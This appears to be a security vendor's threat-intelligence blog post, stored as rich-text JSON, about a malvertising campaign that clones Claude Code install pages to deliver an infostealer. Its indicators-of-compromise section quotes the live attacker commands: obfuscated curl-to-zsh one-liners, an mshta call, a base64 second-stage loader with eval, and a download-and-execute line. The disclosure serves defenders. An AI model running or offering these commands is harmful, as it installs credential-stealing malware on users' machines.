Copy a “curl to bash” (curl https://some.website | bash) one-liner from a website, paste it into your terminal, and hit enter. The entire security model boils down to \"trust the domain.\" And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security-conscious pool of users.",[],{},{"nodeType":1294,"data":3437,"content":3438},{},[3439],{"nodeType":1293,"value":3440,"marks":3441,"data":3443},"It’s not hard to see how attackers can exploit this. ",[3442],{"type":1444},{},{"nodeType":1294,"data":3445,"content":3446},{},[3447,3451,3456],{"nodeType":1293,"value":3448,"marks":3449,"data":3450},"We're tracking a technique we're calling ",[],{},{"nodeType":1293,"value":3452,"marks":3453,"data":3455},"InstallFix",[3454],{"type":1444},{},{"nodeType":1293,"value":3457,"marks":3458,"data":3459},": a clever social engineering attack where threat actors clone the installation pages of legitimate CLI tools and present victims with malicious install commands disguised as the real thing. In each case, the mechanic is the same: the victim sees what looks like a familiar install command, copies it, pastes it, and runs it. Except the command they run is not the one they expected.",[],{},{"nodeType":1351,"data":3461,"content":3465},{"target":3462},{"sys":3463},{"id":3464,"type":1356,"linkType":1357},"6VMkuQkU5L0vObxIojI1Xw",[],{"nodeType":1433,"data":3467,"content":3468},{},[],{"nodeType":1437,"data":3470,"content":3471},{},[3472],{"nodeType":1293,"value":3473,"marks":3474,"data":3476},"InstallFix Claude Code campaign teardown",[3475],{"type":1444},{},{"nodeType":1294,"data":3478,"content":3479},{},[3480],{"nodeType":1293,"value":3481,"marks":3482,"data":3483},"All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice. 
Then, you just need to boost your lure to deliver it to unsuspecting victims via search engine. The most common way of doing this is through sponsored results — aka malvertising. ",[],{},{"nodeType":1294,"data":3485,"content":3486},{},[3487],{"nodeType":1293,"value":3488,"marks":3489,"data":3490},"In the recent examples identified by Push researchers, attackers have simply cloned the installation webpages for tools and updated the installation instructions with malicious commands. ",[],{},{"nodeType":1520,"data":3492,"content":3493},{},[3494],{"nodeType":1293,"value":3495,"marks":3496,"data":3497},"A new campaign targeting Claude Code",[],{},{"nodeType":1294,"data":3499,"content":3500},{},[3501],{"nodeType":1293,"value":3502,"marks":3503,"data":3504},"We've recently observed a campaign that puts this technique into practice against one of the fastest-growing developer tools on the market: Anthropic's Claude Code.",[],{},{"nodeType":1294,"data":3506,"content":3507},{},[3508],{"nodeType":1293,"value":3509,"marks":3510,"data":3511},"Claude Code is a command-line AI coding assistant that has rapidly become the go-to for both experienced developers and amateur vibe-coders. Like many modern CLI tools, the recommended installation method is a one-liner that pipes a remote script into a shell. ",[],{},{"nodeType":1294,"data":3513,"content":3514},{},[3515],{"nodeType":1293,"value":3516,"marks":3517,"data":3518},"The attacker's approach is straightforward. They clone the Claude Code installation page (layout, branding, documentation sidebar, and all), hosting it on a lookalike domain. The page is a near-pixel-perfect replica of the real thing. The only meaningful difference is in the installation commands themselves: instead of fetching the install script from claude.ai, the commands point to an attacker-controlled server that serves malware instead. 
",[],{},{"nodeType":1294,"data":3520,"content":3521},{},[3522],{"nodeType":1293,"value":3523,"marks":3524,"data":3525},"Unless you’re carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one.",[],{},{"nodeType":1294,"data":3527,"content":3528},{},[3529],{"nodeType":1293,"value":3530,"marks":3531,"data":3532},"You can see a video of a user being served a malicious InstallFix page below.",[],{},{"nodeType":1351,"data":3534,"content":3538},{"target":3535},{"sys":3536},{"id":3537,"type":1356,"linkType":1357},"1dhirnghbpAwyCse8cjAas",[],{"nodeType":1351,"data":3540,"content":3544},{"target":3541},{"sys":3542},{"id":3543,"type":1356,"linkType":1357},"5TBnCFM4Y5CoqKPchHDpyv",[],{"nodeType":1294,"data":3546,"content":3547},{},[3548],{"nodeType":1293,"value":3549,"marks":3550,"data":3551},"Any further interaction on the page simply redirects you to the legitimate site, too. So a victim that lands on the page and follows the fake instructions could continue normally without realizing anything had gone wrong. 
",[],{},{"nodeType":1351,"data":3553,"content":3557},{"target":3554},{"sys":3555},{"id":3556,"type":1356,"linkType":1357},"5g3joJSAP8y8xv2bKaLGe2",[],{"nodeType":1520,"data":3559,"content":3560},{},[3561],{"nodeType":1293,"value":3562,"marks":3563,"data":3564},"Distribution via Google Ads",[],{},{"nodeType":1294,"data":3566,"content":3567},{},[3568],{"nodeType":1293,"value":3569,"marks":3570,"data":3571},"The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like \"Claude Code\", \"Claude Code install\", or \"Claude Code CLI.\"",[],{},{"nodeType":1351,"data":3573,"content":3577},{"target":3574},{"sys":3575},{"id":3576,"type":1356,"linkType":1357},"3CTtrOy3q8NoMblxkLlTer",[],{"nodeType":1351,"data":3579,"content":3583},{"target":3580},{"sys":3581},{"id":3582,"type":1356,"linkType":1357},"4m5rg9UhRQK0e8OfYFlIUc",[],{"nodeType":1351,"data":3585,"content":3589},{"target":3586},{"sys":3587},{"id":3588,"type":1356,"linkType":1357},"25lAkq9tTZ2Mq52gs6xR8G",[],{"nodeType":1351,"data":3591,"content":3595},{"target":3592},{"sys":3593},{"id":3594,"type":1356,"linkType":1357},"4f4svuW3tjhNc3kEfCwNRG",[],{"nodeType":1294,"data":3597,"content":3598},{},[3599,3603,3612],{"nodeType":1293,"value":3600,"marks":3601,"data":3602},"Malvertising via Google Search is an effective delivery vector because it bypasses email-based security controls entirely. There's no phishing email to flag, no suspicious link in a message. The user initiates the interaction themselves by searching for something they genuinely intend to install. 
This is one of the reasons that attackers are ",[],{},{"nodeType":1329,"data":3604,"content":3606},{"uri":3605},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis/",[3607],{"nodeType":1293,"value":3608,"marks":3609,"data":3611},"doubling down on targeting ad manager accounts",[3610],{"type":1337},{},{"nodeType":1293,"value":3613,"marks":3614,"data":3615}," to be able to hijack existing ad budgets and spin up even more malicious ads.",[],{},{"nodeType":1294,"data":3617,"content":3618},{},[3619,3624],{"nodeType":1293,"value":3620,"marks":3621,"data":3623},"The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing",[3622],{"type":1444},{},{"nodeType":1293,"value":3625,"marks":3626,"data":3627},", without being actively targeted. That said, ads can be targeted too: Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). So if you've got sufficient intel on your target, you can tailor the ad accordingly. ",[],{},{"nodeType":1294,"data":3629,"content":3630},{},[3631],{"nodeType":1293,"value":3632,"marks":3633,"data":3634},"Since the sponsored result appears above the organic results for the legitimate Claude Code documentation and the displayed URL in the ad appears plausible, victims are more likely to quickly click and access the domain without checking it out fully. 
Search engines typically suppress subdomains from displayed URLs too, giving the attacker additional cover for the lookalike domain.",[],{},{"nodeType":1351,"data":3636,"content":3640},{"target":3637},{"sys":3638},{"id":3639,"type":1356,"linkType":1357},"4Ihz5BcRK0NDVy0ANg2PWe",[],{"nodeType":1520,"data":3642,"content":3643},{},[3644],{"nodeType":1293,"value":3645,"marks":3646,"data":3647},"The payload",[],{},{"nodeType":1294,"data":3649,"content":3650},{},[3651],{"nodeType":1293,"value":3652,"marks":3653,"data":3654},"The malware initiates execution through cmd.exe (PID 8444), which spawns mshta.exe (PID 8700) to retrieve and execute content from a remote URL. The command structure indicates staged execution:",[],{},{"nodeType":1536,"data":3656,"content":3657},{},[3658,3668,3678],{"nodeType":1540,"data":3659,"content":3660},{},[3661],{"nodeType":1294,"data":3662,"content":3663},{},[3664],{"nodeType":1293,"value":3665,"marks":3666,"data":3667},"cmd.exe executes a command-line instruction to launch mshta.exe with a URL parameter pointing to https://claude[.]update-version[.]com/claude",[],{},{"nodeType":1540,"data":3669,"content":3670},{},[3671],{"nodeType":1294,"data":3672,"content":3673},{},[3674],{"nodeType":1293,"value":3675,"marks":3676,"data":3677},"mshta.exe (child process) is invoked to fetch and execute HTML/script content from the malicious domain",[],{},{"nodeType":1540,"data":3679,"content":3680},{},[3681],{"nodeType":1294,"data":3682,"content":3683},{},[3684],{"nodeType":1293,"value":3685,"marks":3686,"data":3687},"conhost.exe (PID 8496) is spawned as a console host, likely to support command execution output",[],{},{"nodeType":1294,"data":3689,"content":3690},{},[3691],{"nodeType":1293,"value":3692,"marks":3693,"data":3694},"The macOS payload also uses additional encoding and staged execution layers.",[],{},{"nodeType":1294,"data":3696,"content":3697},{},[3698],{"nodeType":1293,"value":3699,"marks":3700,"data":3702},"You can see the full list of IoCs 
at the end of the blog.   ",[3701],{"type":1444},{},{"nodeType":1294,"data":3704,"content":3705},{},[3706],{"nodeType":1293,"value":3707,"marks":3708,"data":3709},"Our analysis shows that the payload, retrieved from the command-and-control domain claude[.]update-version[.]com, matches the YARA signatures for the Amatera Stealer malware.",[],{},{"nodeType":1351,"data":3711,"content":3715},{"target":3712},{"sys":3713},{"id":3714,"type":1356,"linkType":1357},"TXcSp34sIAOKIXlKT4Lb0",[],{"nodeType":1294,"data":3717,"content":3718},{},[3719],{"nodeType":1293,"value":3720,"marks":3721,"data":3722},"Notably, we saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign. ",[],{},{"nodeType":1351,"data":3724,"content":3728},{"target":3725},{"sys":3726},{"id":3727,"type":1356,"linkType":1357},"3ExLtcl6df07BcKPsGZn42",[],{"nodeType":1520,"data":3730,"content":3731},{},[3732],{"nodeType":1293,"value":3733,"marks":3734,"data":3735},"Abusing legitimate hosting services",[],{},{"nodeType":1294,"data":3737,"content":3738},{},[3739,3743,3752],{"nodeType":1293,"value":3740,"marks":3741,"data":3742},"Another common theme we see across pretty much every phishing site these days is the abuse of legitimate domains for hosting malicious content. This allows attackers to blend in with normal web traffic and is a core ",[],{},{"nodeType":1329,"data":3744,"content":3746},{"uri":3745},"https://phishing-techniques.pushsecurity.com/",[3747],{"nodeType":1293,"value":3748,"marks":3749,"data":3751},"detection evasion technique",[3750],{"type":1337},{},{"nodeType":1293,"value":2065,"marks":3753,"data":3754},[],{},{"nodeType":1294,"data":3756,"content":3757},{},[3758],{"nodeType":1293,"value":3759,"marks":3760,"data":3761},"In this case, we observed Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne being used. 
",[],{},{"nodeType":1433,"data":3763,"content":3764},{},[],{"nodeType":1437,"data":3766,"content":3767},{},[3768],{"nodeType":1293,"value":3769,"marks":3770,"data":3772},"A broader trend",[3771],{"type":1444},{},{"nodeType":1294,"data":3774,"content":3775},{},[3776],{"nodeType":1293,"value":3777,"marks":3778,"data":3779},"This isn't happening in isolation. Claude and its associated tools have become a recurring target for recent malware distribution campaigns:",[],{},{"nodeType":1536,"data":3781,"content":3782},{},[3783,3806,3829,3852],{"nodeType":1540,"data":3784,"content":3785},{},[3786],{"nodeType":1294,"data":3787,"content":3788},{},[3789,3792,3802],{"nodeType":1293,"value":37,"marks":3790,"data":3791},[],{},{"nodeType":1329,"data":3793,"content":3795},{"uri":3794},"https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/",[3796],{"nodeType":1293,"value":3797,"marks":3798,"data":3801},"Fake Claude artifacts used in traditional ClickFix lures",[3799,3800],{"type":1337},{"type":1444},{},{"nodeType":1293,"value":3803,"marks":3804,"data":3805},": Attackers created public pages on the claude.ai domain itself (user-generated content that inherited the domain's trust) containing malicious terminal commands disguised as macOS utilities. 
These were promoted via hijacked Google Ads and viewed over 15,000 times before being taken down.",[],{},{"nodeType":1540,"data":3807,"content":3808},{},[3809],{"nodeType":1294,"data":3810,"content":3811},{},[3812,3815,3825],{"nodeType":1293,"value":37,"marks":3813,"data":3814},[],{},{"nodeType":1329,"data":3816,"content":3818},{"uri":3817},"https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos",[3819],{"nodeType":1293,"value":3820,"marks":3821,"data":3824},"Fake Homebrew installation pages",[3822,3823],{"type":1337},{"type":1444},{},{"nodeType":1293,"value":3826,"marks":3827,"data":3828},": Near-identical clones of the Homebrew website delivering the Cuckoo infostealer to macOS users, using the same \"copy this install command\" mechanic.",[],{},{"nodeType":1540,"data":3830,"content":3831},{},[3832],{"nodeType":1294,"data":3833,"content":3834},{},[3835,3838,3848],{"nodeType":1293,"value":37,"marks":3836,"data":3837},[],{},{"nodeType":1329,"data":3839,"content":3841},{"uri":3840},"https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer",[3842],{"nodeType":1293,"value":3843,"marks":3844,"data":3847},"Fake OpenClaw installers on GitHub",[3845,3846],{"type":1337},{"type":1444},{},{"nodeType":1293,"value":3849,"marks":3850,"data":3851},": Malicious repositories impersonating the popular AI agent tool, boosted by Bing's AI search results, delivering infostealers and the GhostSocks proxy malware.",[],{},{"nodeType":1540,"data":3853,"content":3854},{},[3855],{"nodeType":1294,"data":3856,"content":3857},{},[3858,3861,3871],{"nodeType":1293,"value":37,"marks":3859,"data":3860},[],{},{"nodeType":1329,"data":3862,"content":3864},{"uri":3863},"https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html",[3865],{"nodeType":1293,"value":3866,"marks":3867,"data":3870},"Trojanised npm packages",[3868,3869],{"type":1337},{"type":1444},{},{"nodeType":1293,"value":3872,"marks":3873,"data":3874},": Malicious packages mimicking Claude Code's 
official npm package name, targeting developers who might make a typo or trust an unofficial source.",[],{},{"nodeType":1294,"data":3876,"content":3877},{},[3878],{"nodeType":1293,"value":3879,"marks":3880,"data":3881},"But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation. For example, we’ve also recently seen attackers target free web tools with clever ClickFix lures that only load after a user has interacted with the page — in the example below, by uploading a file to remove an image background or convert a document to PDF. These are clones of real sites, chosen because they let attackers intercept users entering common search terms. ",[],{},{"nodeType":1351,"data":3883,"content":3887},{"target":3884},{"sys":3885},{"id":3886,"type":1356,"linkType":1357},"6fbQRdi1xXzMOmYTcAGDLc",[],{"nodeType":1433,"data":3889,"content":3890},{},[],{"nodeType":1520,"data":3892,"content":3893},{},[3894],{"nodeType":1293,"value":3895,"marks":3896,"data":3898},"How Push detects InstallFix",[3897],{"type":1444},{},{"nodeType":1294,"data":3900,"content":3901},{},[3902],{"nodeType":1293,"value":3903,"marks":3904,"data":3905},"Regardless of the delivery channel, whether it's a phishing email, a malvertising lure, or a fake install page, all roads lead to a web page loaded in the user's browser, and that's where Push operates.",[],{},{"nodeType":1294,"data":3907,"content":3908},{},[3909],{"nodeType":1293,"value":3910,"marks":3911,"data":3912},"Push sees what the user sees: the page as it renders in the browser, in real time. 
This means we can detect InstallFix pages by identifying the combination of signals that characterise them: lookalike domains impersonating known developer tools, copy-to-clipboard elements containing shell commands, and the presence of malvertising delivery indicators.",[],{},{"nodeType":1294,"data":3914,"content":3915},{},[3916],{"nodeType":1293,"value":3917,"marks":3918,"data":3919},"Because Push detects threats directly in the browser, it doesn't matter that the attack came from a Google Search ad rather than an email. There's no phishing email for a Secure Email Gateway to inspect — the user searched for and navigated to the page themselves. But the page still loads in the browser, where Push is there to catch it.",[],{},{"nodeType":1294,"data":3921,"content":3922},{},[3923,3927,3934,3937,3946,3950,3957],{"nodeType":1293,"value":3924,"marks":3925,"data":3926},"To learn more about how Push protects against InstallFix, ClickFix, and other browser-based attacks, ",[],{},{"nodeType":1329,"data":3928,"content":3929},{"uri":2116},[3930],{"nodeType":1293,"value":2119,"marks":3931,"data":3933},[3932],{"type":1337},{},{"nodeType":1293,"value":1389,"marks":3935,"data":3936},[],{},{"nodeType":1329,"data":3938,"content":3940},{"uri":3939},"https://pushsecurity.com/product-demo/",[3941],{"nodeType":1293,"value":3942,"marks":3943,"data":3945},"visit our demo library",[3944],{"type":1337},{},{"nodeType":1293,"value":3947,"marks":3948,"data":3949},", or ",[],{},{"nodeType":1329,"data":3951,"content":3952},{"uri":2129},[3953],{"nodeType":1293,"value":2132,"marks":3954,"data":3956},[3955],{"type":1337},{},{"nodeType":1293,"value":1516,"marks":3958,"data":3959},[],{},{"nodeType":1433,"data":3961,"content":3962},{},[],{"nodeType":1437,"data":3964,"content":3965},{},[3966],{"nodeType":1293,"value":3967,"marks":3968,"data":3970},"IoCs",[3969],{"type":1444},{},{"nodeType":1294,"data":3972,"content":3973},{},[3974,3978,3987],{"nodeType":1293,"value":3975,"marks":3976,"data":3977},"As 
we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":1329,"data":3979,"content":3981},{"uri":3980},"https://phishing-techniques.pushsecurity.com/techniques/domain-rotation-redirection/",[3982],{"nodeType":1293,"value":3983,"marks":3984,"data":3986},"quickly spin up and rotate the sites used",[3985],{"type":1337},{},{"nodeType":1293,"value":3988,"marks":3989,"data":3990}," in the attack chain. IoC-based detections for campaigns like this are of limited value.",[],{},{"nodeType":1294,"data":3992,"content":3993},{},[3994],{"nodeType":1293,"value":3995,"marks":3996,"data":3997},"This is a fast-moving situation, with domains constantly being spun up. At the time of writing, the domains observed were:",[],{},{"nodeType":1294,"data":3999,"content":4000},{},[4001],{"nodeType":1293,"value":4002,"marks":4003,"data":4005},"Cloned domains:",[4004],{"type":1444},{},{"nodeType":1536,"data":4007,"content":4008},{},[4009,4019,4029,4039,4049,4059,4068,4078,4088,4097,4107,4117,4127,4137,4147,4157,4167,4176,4186,4196,4206],{"nodeType":1540,"data":4010,"content":4011},{},[4012],{"nodeType":1294,"data":4013,"content":4014},{},[4015],{"nodeType":1293,"value":4016,"marks":4017,"data":4018},"claud-code[.]pages[.]dev",[],{},{"nodeType":1540,"data":4020,"content":4021},{},[4022],{"nodeType":1294,"data":4023,"content":4024},{},[4025],{"nodeType":1293,"value":4026,"marks":4027,"data":4028},"claulastver[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4030,"content":4031},{},[4032],{"nodeType":1294,"data":4033,"content":4034},{},[4035],{"nodeType":1293,"value":4036,"marks":4037,"data":4038},"claudecode-developers[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4040,"content":4041},{},[4042],{"nodeType":1294,"data":4043,"content":4044},{},[4045],{"nodeType":1293,"value":4046,"marks":4047,"data":4048},"hgjbulk.pages[.]dev",[],{},{"nodeType":1540,"data":4050,"content":4051},{},[4052],{"nod
eType":1294,"data":4053,"content":4054},{},[4055],{"nodeType":1293,"value":4056,"marks":4057,"data":4058},"jhgyuifyfiguohi[.]pages[.]dev",[],{},{"nodeType":1540,"data":4060,"content":4061},{},[4062],{"nodeType":1294,"data":4063,"content":4064},{},[4065],{"nodeType":1293,"value":4046,"marks":4066,"data":4067},[],{},{"nodeType":1540,"data":4069,"content":4070},{},[4071],{"nodeType":1294,"data":4072,"content":4073},{},[4074],{"nodeType":1293,"value":4075,"marks":4076,"data":4077},"claude-code-install[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4079,"content":4080},{},[4081],{"nodeType":1294,"data":4082,"content":4083},{},[4084],{"nodeType":1293,"value":4085,"marks":4086,"data":4087},"claude-code-docs-site[.]pages[.]dev",[],{},{"nodeType":1540,"data":4089,"content":4090},{},[4091],{"nodeType":1294,"data":4092,"content":4093},{},[4094],{"nodeType":1293,"value":4026,"marks":4095,"data":4096},[],{},{"nodeType":1540,"data":4098,"content":4099},{},[4100],{"nodeType":1294,"data":4101,"content":4102},{},[4103],{"nodeType":1293,"value":4104,"marks":4105,"data":4106},"cladueall[.]pages[.]dev",[],{},{"nodeType":1540,"data":4108,"content":4109},{},[4110],{"nodeType":1294,"data":4111,"content":4112},{},[4113],{"nodeType":1293,"value":4114,"marks":4115,"data":4116},"claude-code-docs-dvlr2jpuuw[.]edgeone[.]app",[],{},{"nodeType":1540,"data":4118,"content":4119},{},[4120],{"nodeType":1294,"data":4121,"content":4122},{},[4123],{"nodeType":1293,"value":4124,"marks":4125,"data":4126},"myclauda[.]it[.]com",[],{},{"nodeType":1540,"data":4128,"content":4129},{},[4130],{"nodeType":1294,"data":4131,"content":4132},{},[4133],{"nodeType":1293,"value":4134,"marks":4135,"data":4136},"vdsafsaf[.]it[.]com",[],{},{"nodeType":1540,"data":4138,"content":4139},{},[4140],{"nodeType":1294,"data":4141,"content":4142},{},[4143],{"nodeType":1293,"value":4144,"marks":4145,"data":4146},"asdasdasdadsvvvvv[.]pages[.]dev/",[],{},{"nodeType":1540,"data":4148,"content":4149},{},[4150],{"nodeType":1294,"data
":4151,"content":4152},{},[4153],{"nodeType":1293,"value":4154,"marks":4155,"data":4156},"nnnnnnnnnnnnnnnnnnnnn[.]pages[.]dev",[],{},{"nodeType":1540,"data":4158,"content":4159},{},[4160],{"nodeType":1294,"data":4161,"content":4162},{},[4163],{"nodeType":1293,"value":4164,"marks":4165,"data":4166},"claude-code-macos[.]com",[],{},{"nodeType":1540,"data":4168,"content":4169},{},[4170],{"nodeType":1294,"data":4171,"content":4172},{},[4173],{"nodeType":1293,"value":4085,"marks":4174,"data":4175},[],{},{"nodeType":1540,"data":4177,"content":4178},{},[4179],{"nodeType":1294,"data":4180,"content":4181},{},[4182],{"nodeType":1293,"value":4183,"marks":4184,"data":4185},"claude-code-update[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4187,"content":4188},{},[4189],{"nodeType":1294,"data":4190,"content":4191},{},[4192],{"nodeType":1293,"value":4193,"marks":4194,"data":4195},"claudecodeupdate[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4197,"content":4198},{},[4199],{"nodeType":1294,"data":4200,"content":4201},{},[4202],{"nodeType":1293,"value":4203,"marks":4204,"data":4205},"notebooklm-version-upd[.]squarespace[.]com",[],{},{"nodeType":1540,"data":4207,"content":4208},{},[4209],{"nodeType":1294,"data":4210,"content":4211},{},[4212],{"nodeType":1293,"value":4213,"marks":4214,"data":4215},"notklmalans[.]pages[.]dev",[],{},{"nodeType":1294,"data":4217,"content":4218},{},[4219],{"nodeType":1293,"value":4220,"marks":4221,"data":4223},"Domains hosting malicious 
payload:",[4222],{"type":1444},{},{"nodeType":1536,"data":4225,"content":4226},{},[4227,4237,4247],{"nodeType":1540,"data":4228,"content":4229},{},[4230],{"nodeType":1294,"data":4231,"content":4232},{},[4233],{"nodeType":1293,"value":4234,"marks":4235,"data":4236},"contatoplus[.]com",[],{},{"nodeType":1540,"data":4238,"content":4239},{},[4240],{"nodeType":1294,"data":4241,"content":4242},{},[4243],{"nodeType":1293,"value":4244,"marks":4245,"data":4246},"sarahmoftah[.]com",[],{},{"nodeType":1540,"data":4248,"content":4249},{},[4250],{"nodeType":1294,"data":4251,"content":4252},{},[4253],{"nodeType":1293,"value":4254,"marks":4255,"data":4256},"claude[.]update-version[.]com",[],{},{"nodeType":1294,"data":4258,"content":4259},{},[4260],{"nodeType":1293,"value":4261,"marks":4262,"data":4264},"Commands:",[4263],{"type":1444},{},{"nodeType":1294,"data":4266,"content":4267},{},[4268],{"nodeType":1293,"value":4269,"marks":4270,"data":4273},"curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh",[4271],{"type":4272},"code",{},{"nodeType":1294,"data":4275,"content":4276},{},[4277],{"nodeType":1293,"value":37,"marks":4278,"data":4279},[],{},{"nodeType":1294,"data":4281,"content":4282},{},[4283],{"nodeType":1293,"value":4284,"marks":4285,"data":4287},"curl -sfkSL $(echo 'aHR0cHM6Ly93cmljb25zdWx0LmNvbS9jdXJsLzhhZjY1YmEzODg1ZDZlMjU5NmVhMmNlMmRiNGEzYmM1ZWUwMmI4ZGViMzM2ZjlhZTkzZTI2MmM0ZGIwMGI3NTc='|base64 -D)| zsh",[4286],{"type":4272},{},{"nodeType":1294,"data":4289,"content":4290},{},[4291],{"nodeType":1293,"value":4292,"marks":4293,"data":4294},"\n",[],{},{"nodeType":1294,"data":4296,"content":4297},{},[4298],{"nodeType":1293,"value":4299,"marks":4300,"data":4302},"C:\\Windows\\SysWOW64\\mshta.exe https://claude.update-version.com/claude 
",[4301],{"type":4272},{},{"nodeType":1294,"data":4304,"content":4305},{},[4306,4309],{"nodeType":1293,"value":4292,"marks":4307,"data":4308},[],{},{"nodeType":1293,"value":4310,"marks":4311,"data":4313},"Base64 decoded url:",[4312],{"type":1444},{},{"nodeType":1294,"data":4315,"content":4316},{},[4317],{"nodeType":1293,"value":4318,"marks":4319,"data":4321},"contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b ",[4320],{"type":4272},{},{"nodeType":1294,"data":4323,"content":4324},{},[4325],{"nodeType":1293,"value":37,"marks":4326,"data":4327},[],{},{"nodeType":1294,"data":4329,"content":4330},{},[4331],{"nodeType":1293,"value":4332,"marks":4333,"data":4335},"saramoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420",[4334],{"type":4272},{},{"nodeType":1294,"data":4337,"content":4338},{},[4339,4342],{"nodeType":1293,"value":4292,"marks":4340,"data":4341},[],{},{"nodeType":1293,"value":4343,"marks":4344,"data":4346},"Second stage:",[4345],{"type":1444},{},{"nodeType":1294,"data":4348,"content":4349},{},[4350],{"nodeType":1293,"value":4351,"marks":4352,"data":4354},"#!/bin/zsh",[4353],{"type":4272},{},{"nodeType":1294,"data":4356,"content":4357},{},[4358],{"nodeType":1293,"value":4359,"marks":4360,"data":4362},"mkgrc9=$(base64 -D \u003C\u003C'PAYLOAD_END' | 
gunzip",[4361],{"type":4272},{},{"nodeType":1294,"data":4364,"content":4365},{},[4366],{"nodeType":1293,"value":4367,"marks":4368,"data":4370},"H4sIAKgRpGkC/13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFMBpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ/zccsxO5j631+pbrYTnkSAAAAA",[4369],{"type":4272},{},{"nodeType":1294,"data":4372,"content":4373},{},[4374],{"nodeType":1293,"value":4375,"marks":4376,"data":4378},"PAYLOAD_END",[4377],{"type":4272},{},{"nodeType":1294,"data":4380,"content":4381},{},[4382],{"nodeType":1293,"value":4383,"marks":4384,"data":4386},")",[4385],{"type":4272},{},{"nodeType":1294,"data":4388,"content":4389},{},[4390],{"nodeType":1293,"value":4391,"marks":4392,"data":4394},"eval \"$mkgrc9\"",[4393],{"type":4272},{},{"nodeType":1294,"data":4396,"content":4397},{},[4398,4401],{"nodeType":1293,"value":4292,"marks":4399,"data":4400},[],{},{"nodeType":1293,"value":4402,"marks":4403,"data":4405},"Binaries:",[4404],{"type":1444},{},{"nodeType":1294,"data":4407,"content":4408},{},[4409],{"nodeType":1293,"value":4351,"marks":4410,"data":4412},[4411],{"type":4272},{},{"nodeType":1294,"data":4414,"content":4415},{},[4416],{"nodeType":1293,"value":4417,"marks":4418,"data":4420},"curl -o /tmp/helper https://saramoftah.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",[4419],{"type":4272},{},{"entries":4422},{"hyperlink":4423,"inline":4424,"block":4425},[],[],[4426,4446,4480,4486,4494,4501,4507,4513,4521,4564,4570,4591,4633],{"sys":4427,"__typename":4428,"content":4429,"name":4445,"title":118},{"id":3420},"InsightTextBlockComponent",{"json":4430},{"nodeType":1295,"data":4431,"content":4432},{},[4433],{"nodeType":1294,"data":4434,"content":4435},{},[4436,4441],{"nodeType":1293,"value":4437,"marks":4438,"data":4440},"Update March 16:",[4439],{"type":1444},{},{"nodeType":1293,"value":4442,"marks":4443,"data":4444}," We've identified a number of additional InstallFix pages targeting both the Claude Code docs page (as 
opposed to the quickstart guide) and NotebookLM, a research and note-taking tool from Google. New IoCs have been added accordingly, but this campaign is moving very quickly, so the list won't stay up to date for long. ",[],{},"installfix insight box 5",{"sys":4447,"__typename":4428,"content":4448,"name":4479,"title":118},{"id":3464},{"json":4449},{"data":4450,"content":4451,"nodeType":1295},{},[4452,4472],{"data":4453,"content":4454,"nodeType":1294},{},[4455,4459,4468],{"data":4456,"marks":4457,"value":4458,"nodeType":1293},{},[],"Feeling *Fix fatigue? Us too. But we felt the naming appropriate to indicate that this is part of the same family of techniques. ClickFix has become synonymous with ",{"data":4460,"content":4462,"nodeType":1329},{"uri":4461},"https://attack.mitre.org/techniques/T1204/004/",[4463],{"data":4464,"marks":4465,"value":4467,"nodeType":1293},{},[4466],{"type":1337},"Malicious Copy and Paste",{"data":4469,"marks":4470,"value":4471,"nodeType":1293},{},[],", even though most lures haven’t been related to “fixing” anything for a while now. The user action is essentially the same; only the context of the lure is different. ",{"data":4473,"content":4474,"nodeType":1294},{},[4475],{"data":4476,"marks":4477,"value":4478,"nodeType":1293},{},[],"But while traditional ClickFix attacks need to manufacture a reason for the user to run a command — a fake CAPTCHA, a fabricated error message, a bogus system prompt — InstallFix doesn't need any of that. 
